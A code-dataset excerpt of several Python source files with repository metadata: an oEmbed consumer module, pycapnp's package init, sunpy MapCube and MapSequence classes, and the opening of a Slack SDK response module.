            response = OEmbedResponse.newFromJSON(raw)
        else:
            raise OEmbedError('Invalid mime-type in response - %s' % \
                              headers['Content-Type'])
        return response

    def setUrllib(self, urllib):
        '''
        Override the default urllib implementation.
        Args:
            urllib: an instance that supports the same API as the urllib2 module
        '''
        self._urllib = urllib

    def setUserAgent(self, user_agent):
        '''
        Override the default user agent
        Args:
            user_agent: a string that should be send to the server as the User-agent
        '''
        self._requestHeaders['User-Agent'] = user_agent
class OEmbedAutoDiscovery(OEmbedEndpoint):
    '''
    An endpoint that discovers a provider's OEmbed API url from the
    <link type="application/{json,xml}+oembed"> tags in the target page's
    HTML head, instead of being configured with a fixed API url.
    '''
    def __init__(self):
        self._urllib = urllib2
        self._initRequestHeaders()
        # Bug fix: this class skipped OEmbedEndpoint.__init__, leaving
        # _implicitFormat unset, so request() raised AttributeError whenever
        # a 'format' parameter was present -- which embed() always supplies.
        # Discovered urls already encode their format, so no '{format}'
        # substitution ever applies here.
        self._implicitFormat = False

    def request(self, url, **opt):
        '''
        Discover the OEmbed API url for the given resource and build the
        final request url.
        Args:
            url: The url of an OEmbed resource.
            **opt: Parameters passed to the url.
        Returns:
            The complete url of the endpoint and resource.
        Raises:
            OEmbedError when no OEmbed link can be discovered.
        '''
        params = opt
        urlApi = self.discover(url)
        if not urlApi:
            raise OEmbedError('No OEmbed URL could be discovered for %s' % url)
        if params.has_key('format') and self._implicitFormat:
            urlApi = self._urlApi.replace('{format}', params['format'])
            del params['format']
        return "%s&%s" % (urlApi, urllib.urlencode(params))

    def discover(self, url, format=None):
        '''
        Fetch *url* and look for an oembed <link> tag in its head.
        Args:
            url: The page to inspect.
            format: Restrict discovery to 'json' or 'xml'; None tries both.
        Returns:
            The discovered API href, or None when absent.
        '''
        from scrape import Session
        s = Session(agent='Banana King')
        r = s.go(url)
        head = r.first('head', enders='/head')
        if not format or (format == 'json'):
            try:
                tag = head.firsttag('link', type='application/json+oembed')
                return tag['href']
            except Exception:
                pass
        if not format or (format == 'xml'):
            try:
                # Bug fix: the result was not assigned, so the return below
                # read a stale or undefined 'tag' instead of the XML link.
                tag = head.firsttag('link', type='application/xml+oembed')
                return tag['href']
            except Exception:
                pass
        return None
class OEmbedUrlScheme(object):
    '''
    A single OEmbed URL scheme, e.g. "http://*.flickr.com/*", compiled to
    a regular expression for matching resource urls.
    '''
    def __init__(self, url):
        '''
        Create a new OEmbedUrlScheme instance.
        Args:
            url: The url scheme. It also takes the wildcard character (*).
        '''
        self._url = url
        # Escape literal dots first, then expand each '*' wildcard to '.*'.
        # (Order matters: escaping after expanding would mangle the '.*'.)
        pattern = url.replace('.', '\\.').replace('*', '.*')
        self._regex = re.compile(pattern)

    def getUrl(self):
        '''Return the raw url scheme string.'''
        return self._url

    def match(self, url):
        '''Return True when *url* matches this scheme, False otherwise.'''
        return self._regex.match(url) is not None

    def __repr__(self):
        return "%s - %s" % (object.__repr__(self), self._url)
class OEmbedConsumer(object):
    '''
    A class representing an OEmbed consumer.
    This class manages a number of endpoints, selects the corresponding one
    according to the resource url passed to the embed function and fetches
    the data.
    '''
    def __init__(self):
        self._endpoints = []

    def addEndpoint(self, endpoint):
        '''
        Add a new OEmbedEndpoint to be managed by the consumer.
        Args:
            endpoint: An instance of an OEmbedEndpoint class.
        '''
        self._endpoints.append(endpoint)

    def delEndpoint(self, endpoint):
        '''
        Remove an OEmbedEndpoint from this consumer.
        Args:
            endpoint: An instance of an OEmbedEndpoint class.
        '''
        self._endpoints.remove(endpoint)

    def clearEndpoints(self):
        '''Clear all the endpoints managed by this consumer.'''
        del self._endpoints[:]

    def getEndpoints(self):
        '''
        Get the list of endpoints.
        Returns:
            The list of endpoints in this consumer.
        '''
        return self._endpoints

    def _endpointFor(self, url):
        # First registered endpoint whose url scheme matches wins.
        for endpoint in self._endpoints:
            if endpoint.match(url):
                return endpoint
        return None

    def _request(self, url, **opt):
        endpoint = self._endpointFor(url)
        if endpoint is None:
            # No configured endpoint: fall back to HTML <link> autodiscovery,
            # which itself raises OEmbedError when nothing can be found.
            # Bug fix: a 'raise OEmbedNoEndpoint' sat unreachably after this
            # return (and a dead trailing return after it); both removed.
            logging.debug('No endpoint found for %s, attempting auto-discovery.' % url)
            return OEmbedAutoDiscovery().get(url, **opt)
        return endpoint.get(url, **opt)

    def embed(self, url, format='json', **opt):
        '''
        Get an OEmbedResponse from one of the providers configured in this
        consumer according to the resource url.
        Args:
            url: The url of the resource to get.
            format: Desired response format.
            **opt: Optional parameters to pass in the url to the provider.
        Returns:
            OEmbedResponse object.
        Raises:
            OEmbedInvalidRequest for formats other than 'json' or 'xml'.
        '''
        if format not in ['json', 'xml']:
            raise OEmbedInvalidRequest('Format must be json or xml')
        opt['format'] = format
        return self._request(url, **opt)
"""
>>> r = DefaultOEmbedConsumer.embed('http://www.flickr.com/photos/14950906@N07/3501945280/')
>>> r['author_name']
'gicol'
>>> r['url']
'http://farm4.static.flickr.com/3582/3501945280_fa47a316b1.jpg'
"""
DefaultOEmbedConsumer = OEmbedConsumer()
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.youtube.com/oembed',
['http://www.youtube.com/watch*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.flickr.com/services/oembed',
['http://*.flickr.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://revision3.com/api/oembed/',
['http://*.revision3.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.hulu.com/api/oembed.{format}',
['http://www.hulu.com/watch/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.vimeo.com/api/oembed.{format}',
['http://www.vimeo.com/*',
'http://vimeo.com/*',
'http://www.vimeo.com/groups/*/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://lab.viddler.com/services/oembed/',
['http://*.viddler.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.scribd.com/services/oembed',
['http://*.scribd.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://qik.com/api/oembed.{format}',
['http://qik.com/*']))
DefaultOEmbedConsumer.addEndpoint(
OEmbedEndpoint('http://www.dailymotion.com/api/oembed',
['http://www.dailymotion.com/*']))
| {
"repo_name": "dokterbob/python-oembed",
"path": "oembed.py",
"copies": "1",
"size": "18684",
"license": "mit",
"hash": 9131043426459385000,
"line_mean": 29.1841680129,
"line_max": 108,
"alpha_frac": 0.5730036395,
"autogenerated": false,
"ratio": 4.433792121499763,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5506795760999763,
"avg_score": null,
"num_lines": null
} |
"""A python library wrapping the Cap'n Proto C++ library
Example Usage::
import capnp
addressbook = capnp.load('addressbook.capnp')
# Building
addresses = addressbook.AddressBook.newMessage()
people = addresses.init('people', 1)
alice = people[0]
alice.id = 123
alice.name = 'Alice'
alice.email = 'alice@example.com'
alicePhone = alice.init('phones', 1)[0]
alicePhone.type = 'mobile'
f = open('example.bin', 'w')
addresses.write(f)
f.close()
# Reading
f = open('example.bin')
addresses = addressbook.AddressBook.read(f)
for person in addresses.people:
print(person.name, ':', person.email)
for phone in person.phones:
print(phone.type, ':', phone.number)
"""
# flake8: noqa F401 F403 F405
from .version import version as __version__
from .lib.capnp import *
from .lib.capnp import (
_CapabilityClient,
_DynamicCapabilityClient,
_DynamicListBuilder,
_DynamicListReader,
_DynamicOrphan,
_DynamicResizableListBuilder,
_DynamicStructBuilder,
_DynamicStructReader,
_EventLoop,
_InterfaceModule,
_ListSchema,
_MallocMessageBuilder,
_PackedFdMessageReader,
_StreamFdMessageReader,
_StructModule,
_write_message_to_fd,
_write_packed_message_to_fd,
_Promise as Promise,
_init_capnp_api,
)
_init_capnp_api()  # set up the C-extension API (imported from .lib.capnp above)
add_import_hook()  # enable import hook by default
| {
"repo_name": "jparyani/pycapnp",
"path": "capnp/__init__.py",
"copies": "1",
"size": "1434",
"license": "bsd-2-clause",
"hash": -3096686618089659400,
"line_mean": 22.9,
"line_max": 56,
"alpha_frac": 0.659693166,
"autogenerated": false,
"ratio": 3.4388489208633093,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4598542086863309,
"avg_score": null,
"num_lines": null
} |
"""A Python MapCube Object"""
from __future__ import absolute_import
#pylint: disable=W0401,W0614,W0201,W0212,W0404
__author__ = "Keith Hughitt"
__email__ = "keith.hughitt@nasa.gov"
from sunpy.map import Map
from sunpy.map.sources import *
import numpy as np
#
# 2011/04/13: Should Map be broken up into Map and MapHeader classes? This way
# mapped header values can be used in MapCube without having to keep extra
# copies of the data..
#
class MapCube(np.ndarray):
    """
    MapCube(input)

    A spatially-aware data array based on the SolarSoft Map object.

    Reads in the files at the specified location, stores their headers, and
    creates a 3d array from their contents.

    Parameters
    ----------
    args : {string | Map}*
        Map instances or filepaths from which MapCube should be built.
    sortby : {"date"}
        Method by which the MapCube should be sorted along the z-axis.

    Attributes
    ----------
    headers : list
        a list of dictionaries containing the original and normalized header
        tags for the files used to build the MapCube.

    See Also
    --------
    numpy.ndarray Parent class for the MapCube object
    :class:`sunpy.map.Map`

    Examples
    --------
    >>> mapcube = sunpy.make_map('images/')
    >>> mapcube[0].show()
    >>> mapcube[3].reference_pixel['x']
    2050.6599120000001
    """
    def __new__(cls, *args, **kwargs):
        """Creates a new Map instance"""
        maps = []
        data = []
        headers = []

        # convert input to maps
        for item in args:
            if isinstance(item, Map):
                maps.append(item)
            else:
                maps.append(Map.read(item))

        # sort data (defaults to sorting by observation date)
        sortby = kwargs.get("sortby", "date")
        if hasattr(cls, '_sort_by_%s' % sortby):
            maps.sort(key=getattr(cls, '_sort_by_%s' % sortby)())

        # create data cube; headers are kept alongside the pixel data
        for map_ in maps:
            data.append(np.array(map_))
            headers.append(map_._original_header)

        obj = np.asarray(data).view(cls)
        obj._headers = headers
        return obj

    #pylint: disable=W0613,E1101
    def __init__(self, *args, **kwargs):
        # __init__ only runs optional post-processing; the array itself is
        # built in __new__.
        coalign = kwargs.get("coalign", False)
        derotate = kwargs.get("derotate", False)

        # Coalignment (dispatches to a _coalign_<name> method if present)
        if coalign and hasattr(self, '_coalign_%s' % coalign):
            getattr(self, '_coalign_%s' % coalign)()

        if derotate:
            self._derotate()

    def __array_finalize__(self, obj):
        """Finishes instantiation of the new MapCube object"""
        if obj is None:
            return

        if hasattr(obj, '_headers'):
            self._headers = obj._headers

    def __array_wrap__(self, out_arr, context=None):
        """Returns a wrapped instance of a MapCube object"""
        return np.ndarray.__array_wrap__(self, out_arr, context)

    def __getitem__(self, key):
        """Overriding indexing operation"""
        # BUG FIX: the original used "self.ndim is 3", which compares an
        # int by identity and is implementation-dependent; use == instead.
        if self.ndim == 3 and isinstance(key, int):
            data = np.ndarray.__getitem__(self, key)
            header = self._headers[key]
            # Re-wrap the 2d slice in the matching Map subclass.
            for cls in Map.__subclasses__():
                if cls.is_datasource_for(header):
                    return cls(data, header)
        else:
            return np.ndarray.__getitem__(self, key)

    def std(self, *args, **kwargs):
        """overide np.ndarray.std()"""
        # Drop the MapCube subclass so the plain ndarray std is computed.
        return np.array(self, copy=False, subok=False).std(*args, **kwargs)

    # Coalignment methods
    def _coalign_diff(self):
        """Difference-based coalignment

        Coaligns data by minimizing the difference between subsequent images
        before and after shifting the images one to several pixels in each
        direction.

        pseudo-code:

        for i len(self):
            min_diff = {'value': (), 'offset': (0, 0)} # () is pos infinity

            # try shifting 1 pixel in each direction
            for x in (-1, 0, 1):
                for y in (-1, 0, 1):
                    # calculate difference for intersecting pixels
                    # if < min_diff['value'], store new value/offset

            # shift image
            if min_diff['offset'] != (0, 0):
                # shift and clip image
        """
        pass

    # Sorting methods
    @classmethod
    def _sort_by_date(cls):
        # Key function for sorting maps chronologically.
        return lambda m: m.date # maps.sort(key=attrgetter('date'))

    def _derotate(self):
        """Derotates the layers in the MapCube"""
        pass

    def plot(self):
        """A basic plot method (not yet implemented)"""
        pass
| {
"repo_name": "jslhs/sunpy",
"path": "sunpy/map/mapcube.py",
"copies": "1",
"size": "4703",
"license": "bsd-2-clause",
"hash": -4326517363876252700,
"line_mean": 29.3419354839,
"line_max": 122,
"alpha_frac": 0.5526259834,
"autogenerated": false,
"ratio": 4.12182296231376,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.517444894571376,
"avg_score": null,
"num_lines": null
} |
"""A Python MapCube Object"""
from __future__ import absolute_import
#pylint: disable=W0401,W0614,W0201,W0212,W0404
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from copy import copy
from sunpy.map import Map
from sunpy.map.sources import *
from sunpy.util import plotting
__all__ = ['MapCube']
# (https://github.com/sunpy/sunpy/issues/397)
# 2011/04/13: Should Map be broken up into Map and MapHeader classes? This way
# mapped header values can be used in MapCube without having to keep extra
# copies of the data..
#
class MapCube(np.ndarray):
    """
    MapCube(input)

    A spatially-aware data array based on the SolarSoft Map object.

    Reads in the files at the specified location, stores their headers, and
    creates a 3d array from their contents.

    Parameters
    ----------
    args : {string | Map}*
        Map instances or filepaths from which MapCube should be built.
    sortby : {"date"}
        Method by which the MapCube should be sorted along the z-axis.

    Attributes
    ----------
    headers : list
        a list of dictionaries containing the original and normalized header
        tags for the files used to build the MapCube.

    See Also
    --------
    numpy.ndarray Parent class for the MapCube object
    :class:`sunpy.map.Map`

    Examples
    --------
    >>> mapcube = sunpy.make_map('images/')
    >>> mapcube[0].show()
    >>> mapcube[3].reference_pixel['x']
    2050.6599120000001
    """
    def __new__(cls, *args, **kwargs):
        """Creates a new Map instance"""
        maps = []
        data = []
        headers = []

        # convert input to maps
        for item in args:
            if isinstance(item, Map):
                maps.append(item)
            else:
                maps.append(Map.read(item))

        # sort data (defaults to sorting by observation date)
        sortby = kwargs.get("sortby", "date")
        if hasattr(cls, '_sort_by_%s' % sortby):
            maps.sort(key=getattr(cls, '_sort_by_%s' % sortby)())

        # create data cube; headers are kept alongside the pixel data
        for map_ in maps:
            data.append(np.array(map_))
            headers.append(map_._original_header)

        obj = np.asarray(data).view(cls)
        obj._headers = headers
        return obj

    #pylint: disable=W0613,E1101
    def __init__(self, *args, **kwargs):
        # __init__ only runs optional post-processing; the array itself is
        # built in __new__.
        coalign = kwargs.get("coalign", False)
        derotate = kwargs.get("derotate", False)

        # Coalignment (dispatches to a _coalign_<name> method if present)
        if coalign and hasattr(self, '_coalign_%s' % coalign):
            getattr(self, '_coalign_%s' % coalign)()

        if derotate:
            self._derotate()

    def __array_finalize__(self, obj):
        """Finishes instantiation of the new MapCube object"""
        if obj is None:
            return

        if hasattr(obj, '_headers'):
            self._headers = obj._headers

    def __array_wrap__(self, out_arr, context=None):
        """Returns a wrapped instance of a MapCube object"""
        return np.ndarray.__array_wrap__(self, out_arr, context)

    def __getitem__(self, key):
        """Overriding indexing operation"""
        # BUG FIX: the original used "self.ndim is 3", which compares an
        # int by identity and is implementation-dependent; use == instead.
        if self.ndim == 3 and isinstance(key, int):
            data = np.ndarray.__getitem__(self, key)
            header = self._headers[key]
            # Re-wrap the 2d slice in the matching Map subclass.
            for cls in Map.__subclasses__():
                if cls.is_datasource_for(header):
                    return cls(data, header)
        else:
            return np.ndarray.__getitem__(self, key)

    def std(self, *args, **kwargs):
        """overide np.ndarray.std()"""
        # Drop the MapCube subclass so the plain ndarray std is computed.
        return np.array(self, copy=False, subok=False).std(*args, **kwargs)

    # Coalignment methods
    def _coalign_diff(self):
        """Difference-based coalignment

        Coaligns data by minimizing the difference between subsequent images
        before and after shifting the images one to several pixels in each
        direction.

        pseudo-code:

        for i len(self):
            min_diff = {'value': (), 'offset': (0, 0)} # () is pos infinity

            # try shifting 1 pixel in each direction
            for x in (-1, 0, 1):
                for y in (-1, 0, 1):
                    # calculate difference for intersecting pixels
                    # if < min_diff['value'], store new value/offset

            # shift image
            if min_diff['offset'] != (0, 0):
                # shift and clip image
        """
        pass

    # Sorting methods
    @classmethod
    def _sort_by_date(cls):
        # Key function for sorting maps chronologically.
        return lambda m: m.date # maps.sort(key=attrgetter('date'))

    def _derotate(self):
        """Derotates the layers in the MapCube"""
        pass

    def plot(self, gamma=None, annotate=True, axes=None, controls=True,
             interval=200, resample=False, colorbar=False,
             **ani_args):
        """
        A animation plotting routine that animates each element in the
        MapCube

        Parameters
        ----------
        gamma: float
            Gamma value to use for the color map
        annotate: bool
            If true, the data is plotted at it's natural scale; with
            title and axis labels.
        axes: matplotlib.axes object or None
            If provided the image will be plotted on the given axes. Else the
            current matplotlib axes will be used.
        controls: bool
            Adds play / pause button to the animation
        interval: int
            Frame display time in ms.
        resample: list or False
            Draws the map at a lower resolution to increase the speed of
            animation. Specify a list as a fraction i.e. [0.25, 0.25] to
            plot at 1/4 resolution.
        colorbar: bool
            Draw a colorbar on the plot.
        **ani_args : dict
            Any additional imshow arguments that should be used
            when plotting the image. Passed to
            sunpy.util.plotting.ControlFuncAnimation

        Examples
        --------
        cube = MapCube(*maps)
        ani = cube.plot(colorbar=True)
        plt.show()

        #Plot the map at 1/2 original resolution.
        cube = MapCube(*maps)
        ani = cube.plot(resample=[0.5, 0.5], colorbar=True)
        plt.show()
        """
        if not axes:
            axes = plt.gca()
        fig = axes.get_figure()

        # Normal plot
        if annotate:
            axes.set_title("%s %s" % (self[0].name, self[0].date))

            # x-axis label
            if self[0].coordinate_system['x'] == 'HG':
                xlabel = 'Longitude [%s]' % self[0].units['x']
            else:
                xlabel = 'X-position [%s]' % self[0].units['x']

            # y-axis label
            if self[0].coordinate_system['y'] == 'HG':
                ylabel = 'Latitude [%s]' % self[0].units['y']
            else:
                ylabel = 'Y-position [%s]' % self[0].units['y']

            axes.set_xlabel(xlabel)
            axes.set_ylabel(ylabel)

        # Determine extent
        extent = self[0].xrange + self[0].yrange

        cmap = copy(self[0].cmap)
        if gamma is not None:
            cmap.set_gamma(gamma)

        #make imshow kwargs a dict
        kwargs = {'origin':'lower',
                  'cmap':cmap,
                  'norm':self[0].norm(),
                  'extent':extent,
                  'interpolation':'nearest'}
        kwargs.update(ani_args)

        im = axes.imshow(self[0], **kwargs)

        #Set current image (makes colorbar work)
        plt.sci(im)

        # BUG FIX: honour the `colorbar` flag -- the original drew the
        # colorbar unconditionally, ignoring the documented parameter.
        if colorbar:
            divider = make_axes_locatable(axes)
            cax = divider.append_axes("right", size="5%", pad=0.2)
            plt.colorbar(im, cax)

        if resample:
            resample = np.array(self.shape[1:]) * np.array(resample)
            ani_data = [x.resample(resample) for x in self]
        else:
            ani_data = self

        def updatefig(i, *args):
            # args = [im, annotate, ani_data]
            im = args[0]
            im.set_array(args[2][i])
            im.set_cmap(self[i].cmap)
            im.set_norm(self[i].norm())
            if args[1]:
                axes.set_title("%s %s" % (self[i].name, self[i].date))

        ani = plotting.ControlFuncAnimation(fig, updatefig,
                                            frames=xrange(0,self.shape[0]),
                                            fargs=[im,annotate,ani_data],
                                            interval=interval,
                                            blit=False,**ani_args)

        if controls:
            axes, bax1, bax2, bax3 = plotting.add_controls(axes=axes)

            bax1._button.on_clicked(ani._start)
            bax2._button.on_clicked(ani._stop)
            bax3._button.on_clicked(ani._step)

        return ani
| {
"repo_name": "mjm159/sunpy",
"path": "sunpy/map/mapcube.py",
"copies": "1",
"size": "9043",
"license": "bsd-2-clause",
"hash": -2312816624538916000,
"line_mean": 31.0673758865,
"line_max": 122,
"alpha_frac": 0.5195178591,
"autogenerated": false,
"ratio": 4.1962877030162415,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5215805562116241,
"avg_score": null,
"num_lines": null
} |
"""A Python MapSequence Object"""
#pylint: disable=W0401,W0614,W0201,W0212,W0404
from copy import deepcopy
import numpy as np
import matplotlib.animation
import numpy.ma as ma
import astropy.units as u
from sunpy.map import GenericMap
from sunpy.visualization.animator.mapsequenceanimator import MapSequenceAnimator
from sunpy.visualization import wcsaxes_compat
from sunpy.visualization import axis_labels_from_ctype
from sunpy.util import expand_list
__all__ = ['MapSequence']
class MapSequence(object):
    """
    MapSequence

    A series of Maps in a single object.

    Parameters
    ----------
    args : `list`
        A list of Map instances
    sortby : `datetime.datetime`
        Method by which the MapSequence should be sorted along the z-axis.
    derotate : `bool`
        Apply a derotation to the data. Default to False.

    To coalign a mapsequence so that solar features remain on the same pixels,
    please see the "Coalignment of MapSequences" note below.

    Attributes
    ----------
    maps : `list`
        This attribute holds the list of Map instances obtained from parameter args.

    Examples
    --------
    >>> import sunpy.map
    >>> mapsequence = sunpy.map.Map('images/*.fits', sequence=True)   # doctest: +SKIP

    MapSequences can be co-aligned using the routines in sunpy.image.coalignment.
    """
    def __init__(self, *args, sortby='date', derotate=False, **kwargs):
        """Creates a new Map instance"""
        self.maps = expand_list(args)

        for m in self.maps:
            if not isinstance(m, GenericMap):
                raise ValueError('MapSequence expects pre-constructed map objects.')

        # Optionally sort data (only chronological sorting is supported)
        if sortby is not None:
            if sortby == 'date':
                self.maps.sort(key=self._sort_by_date())
            else:
                raise ValueError("Only sort by date is supported")

        if derotate:
            self._derotate()

    def __getitem__(self, key):
        """Overriding indexing operation.  If the key results in a single map,
        then a map object is returned.  This allows functions like enumerate to
        work.  Otherwise, a mapsequence is returned."""
        if isinstance(self.maps[key], GenericMap):
            return self.maps[key]
        else:
            return MapSequence(self.maps[key])

    def __len__(self):
        """Return the number of maps in a mapsequence."""
        return len(self.maps)

    # Sorting methods
    @classmethod
    def _sort_by_date(cls):
        # Key function for sorting maps chronologically.
        return lambda m: m.date  # maps.sort(key=attrgetter('date'))

    def _derotate(self):
        """Derotates the layers in the MapSequence"""
        pass

    def plot(self, axes=None, resample=None, annotate=True,
             interval=200, plot_function=None, **kwargs):
        """
        A animation plotting routine that animates each element in the
        MapSequence

        Parameters
        ----------
        axes: mpl axes
            axes to plot the animation on, if none uses current axes
        resample: list or False
            Draws the map at a lower resolution to increase the speed of
            animation. Specify a list as a fraction i.e. [0.25, 0.25] to
            plot at 1/4 resolution.
            [Note: this will only work where the map arrays are the same size]
        annotate: bool
            Annotate the figure with scale and titles
        interval: int
            Animation interval in ms
        plot_function : function
            A function to be called as each map is plotted. Any variables
            returned from the function will have their ``remove()`` method called
            at the start of the next frame so that they are removed from the plot.

        Examples
        --------
        >>> import matplotlib.pyplot as plt
        >>> import matplotlib.animation as animation
        >>> from sunpy.map import Map

        >>> sequence = Map(files, sequence=True)   # doctest: +SKIP
        >>> ani = sequence.plot(colorbar=True)   # doctest: +SKIP
        >>> plt.show()   # doctest: +SKIP

        Plot the map at 1/2 original resolution

        >>> sequence = Map(files, sequence=True)   # doctest: +SKIP
        >>> ani = sequence.plot(resample=[0.5, 0.5], colorbar=True)   # doctest: +SKIP
        >>> plt.show()   # doctest: +SKIP

        Save an animation of the MapSequence

        >>> sequence = Map(res, sequence=True)   # doctest: +SKIP

        >>> ani = sequence.plot()   # doctest: +SKIP

        >>> Writer = animation.writers['ffmpeg']   # doctest: +SKIP
        >>> writer = Writer(fps=10, metadata=dict(artist='SunPy'), bitrate=1800)   # doctest: +SKIP

        >>> ani.save('mapsequence_animation.mp4', writer=writer)   # doctest: +SKIP

        Save an animation with the limb at each time step

        >>> def myplot(fig, ax, sunpy_map):
        ...    p = sunpy_map.draw_limb()
        ...    return p
        >>> sequence = Map(files, sequence=True)   # doctest: +SKIP
        >>> ani = sequence.peek(plot_function=myplot)   # doctest: +SKIP
        >>> plt.show()   # doctest: +SKIP
        """
        if not axes:
            axes = wcsaxes_compat.gca_wcs(self.maps[0].wcs)
        fig = axes.get_figure()

        if not plot_function:
            plot_function = lambda fig, ax, smap: []
        removes = []

        # Normal plot
        def annotate_frame(i):
            axes.set_title("{s.name}".format(s=self[i]))
            axes.set_xlabel(axis_labels_from_ctype(self[i].coordinate_system[0],
                                                   self[i].spatial_units[0]))
            axes.set_ylabel(axis_labels_from_ctype(self[i].coordinate_system[1],
                                                   self[i].spatial_units[1]))

        if resample:
            if self.all_maps_same_shape():
                resample = u.Quantity(self.maps[0].dimensions) * np.array(resample)
                ani_data = [amap.resample(resample) for amap in self.maps]
            else:
                raise ValueError('Maps in mapsequence do not all have the same shape.')
        else:
            ani_data = self.maps

        im = ani_data[0].plot(axes=axes, **kwargs)

        def updatefig(i, im, annotate, ani_data, removes):
            while removes:
                removes.pop(0).remove()

            im.set_array(ani_data[i].data)
            im.set_cmap(ani_data[i].plot_settings['cmap'])

            norm = deepcopy(ani_data[i].plot_settings['norm'])
            # The following explicit call is for bugged versions of Astropy's
            # ImageNormalize
            norm.autoscale_None(ani_data[i].data)
            im.set_norm(norm)

            if wcsaxes_compat.is_wcsaxes(axes):
                im.axes.reset_wcs(ani_data[i].wcs)
                wcsaxes_compat.default_wcs_grid(axes)
            else:
                bl = ani_data[i]._get_lon_lat(ani_data[i].bottom_left_coord)
                tr = ani_data[i]._get_lon_lat(ani_data[i].top_right_coord)
                x_range = list(u.Quantity([bl[0], tr[0]]).to(ani_data[i].spatial_units[0]).value)
                y_range = list(u.Quantity([bl[1], tr[1]]).to(ani_data[i].spatial_units[1]).value)
                # BUG FIX: x_range and y_range are already plain lists of
                # values (.value was applied above); calling .value on them
                # again raised AttributeError in this branch.
                im.set_extent(np.concatenate((x_range, y_range)))

            if annotate:
                annotate_frame(i)
            removes += list(plot_function(fig, axes, ani_data[i]))

        ani = matplotlib.animation.FuncAnimation(fig, updatefig,
                                                 frames=list(range(0, len(ani_data))),
                                                 fargs=[im, annotate, ani_data, removes],
                                                 interval=interval,
                                                 blit=False)

        return ani

    def peek(self, resample=None, **kwargs):
        """
        A animation plotting routine that animates each element in the
        MapSequence

        Parameters
        ----------
        fig: mpl.figure
            Figure to use to create the explorer
        resample: list or False
            Draws the map at a lower resolution to increase the speed of
            animation. Specify a list as a fraction i.e. [0.25, 0.25] to
            plot at 1/4 resolution.
            [Note: this will only work where the map arrays are the same size]
        annotate: bool
            Annotate the figure with scale and titles
        interval: int
            Animation interval in ms
        colorbar: bool
            Plot colorbar
        plot_function : function
            A function to call to overplot extra items on the map plot.
            For more information see `sunpy.visualization.MapSequenceAnimator`.

        Returns
        -------
        mapsequenceanim : `sunpy.visualization.MapSequenceAnimator`
            A mapsequence animator instance.

        See Also
        --------
        sunpy.visualization.mapsequenceanimator.MapSequenceAnimator

        Examples
        --------
        >>> import matplotlib.pyplot as plt
        >>> from sunpy.map import Map

        >>> sequence = Map(files, sequence=True)   # doctest: +SKIP
        >>> ani = sequence.peek(colorbar=True)   # doctest: +SKIP
        >>> plt.show()   # doctest: +SKIP

        Plot the map at 1/2 original resolution

        >>> sequence = Map(files, sequence=True)   # doctest: +SKIP
        >>> ani = sequence.peek(resample=[0.5, 0.5], colorbar=True)   # doctest: +SKIP
        >>> plt.show()   # doctest: +SKIP

        Plot the map with the limb at each time step

        >>> def myplot(fig, ax, sunpy_map):
        ...    p = sunpy_map.draw_limb()
        ...    return p
        >>> sequence = Map(files, sequence=True)   # doctest: +SKIP
        >>> ani = sequence.peek(plot_function=myplot)   # doctest: +SKIP
        >>> plt.show()   # doctest: +SKIP

        Decide you want an animation:

        >>> sequence = Map(files, sequence=True)   # doctest: +SKIP
        >>> ani = sequence.peek(resample=[0.5, 0.5], colorbar=True)   # doctest: +SKIP
        >>> mplani = ani.get_animation()   # doctest: +SKIP
        """
        if resample:
            if self.all_maps_same_shape():
                plot_sequence = MapSequence()
                resample = u.Quantity(self.maps[0].dimensions) * np.array(resample)
                for amap in self.maps:
                    plot_sequence.maps.append(amap.resample(resample))
            else:
                raise ValueError('Maps in mapsequence do not all have the same shape.')
        else:
            plot_sequence = self

        return MapSequenceAnimator(plot_sequence, **kwargs)

    def all_maps_same_shape(self):
        """
        Tests if all the maps have the same number pixels in the x and y
        directions.
        """
        return np.all([m.data.shape == self.maps[0].data.shape for m in self.maps])

    def at_least_one_map_has_mask(self):
        """
        Tests if at least one map has a mask.
        """
        return np.any([m.mask is not None for m in self.maps])

    def as_array(self):
        """
        If all the map shapes are the same, their image data is rendered
        into the appropriate numpy object.  If none of the maps have masks,
        then the data is returned as a (ny, nx, nt) ndarray.  If all the maps
        have masks, then the data is returned as a (ny, nx, nt) masked array
        with all the masks copied from each map.  If only some of the maps
        have masked then the data is returned as a (ny, nx, nt) masked array,
        with masks copied from maps as appropriately; maps that do not have a
        mask are supplied with a mask that is full of False entries.
        If all the map shapes are not the same, a ValueError is thrown.
        """
        if self.all_maps_same_shape():
            data = np.swapaxes(np.swapaxes(np.asarray([m.data for m in self.maps]), 0, 1).copy(), 1, 2).copy()
            if self.at_least_one_map_has_mask():
                mask_sequence = np.zeros_like(data, dtype=bool)
                for im, m in enumerate(self.maps):
                    if m.mask is not None:
                        mask_sequence[:, :, im] = m.mask
                return ma.masked_array(data, mask=mask_sequence)
            else:
                return data
        else:
            raise ValueError('Not all maps have the same shape.')

    def all_meta(self):
        """
        Return all the meta objects as a list.
        """
        return [m.meta for m in self.maps]
| {
"repo_name": "dpshelio/sunpy",
"path": "sunpy/map/mapsequence.py",
"copies": "2",
"size": "12537",
"license": "bsd-2-clause",
"hash": 7905458284517244000,
"line_mean": 35.3391304348,
"line_max": 110,
"alpha_frac": 0.5695940018,
"autogenerated": false,
"ratio": 4.090375203915172,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0009144790546313384,
"num_lines": 345
} |
"""A Python module for interacting and consuming responses from Slack."""
import asyncio
# Standard Imports
import logging
# Internal Imports
from typing import Union
import slack_sdk.errors as e
class LegacySlackResponse(object):  # skipcq: PYL-R0205
    """An iterable container of response data.

    Attributes:
        data (dict): The json-encoded content of the response. Along
            with the headers and status code information.

    Methods:
